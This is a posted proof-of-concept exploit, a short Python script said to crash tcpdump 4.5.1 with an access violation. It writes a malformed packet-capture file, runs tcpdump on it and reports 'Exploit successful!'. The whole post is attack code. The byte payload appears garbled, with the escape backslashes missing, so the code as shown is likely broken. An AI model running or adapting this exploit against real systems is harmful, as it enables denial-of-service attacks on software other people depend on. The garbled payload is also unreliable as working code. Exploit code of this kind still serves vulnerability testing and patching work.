TCPDump 4.5.1 Crash Proof Of Concept
Posted on 01 June 2016
# Exploit Title: tcpdump 4.5.1 Access Violation Crash # Date: 31st May 2016 # Exploit Author: David Silveiro # Vendor Homepage: http://www.tcpdump.org # Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz # Version: 4.5.1 # Tested on: Ubuntu 14 LTS from subprocess import call from shlex import split from time import sleep def crash(): command = 'tcpdump -r crash' buffer = 'xd4xc3xb2xa1x02x00x04x00x00x00x00xf5xff' buffer += 'x00x00x00Ix00x00x00xe6x00x00x00x00x80x00' buffer += 'x00x00x00x00x00x08x00x00x00x00<x9c7@xffx00' buffer += 'x06xa0rx7fx00x00x01x7fx00x00xecx00x01xe0x1a' buffer += "x00x17g+++++++x85xc9x03x00x00x00x10xa0&x80x18'" buffer += "xfe$x00x01x00x00@x0cx04x02x08 ', 'x00x00x00x00" buffer += 'x00x00x00x00x01x03x03x04' with open('crash', 'w+b') as file: file.write(buffer) try: call(split(command)) print("Exploit successful! ") except: print("Error: Something has gone wrong!") def main(): print("Author: David Silveiro ") print(" tcpdump version 4.5.1 Access Violation Crash ") sleep(2) crash() if __name__ == "__main__": main()
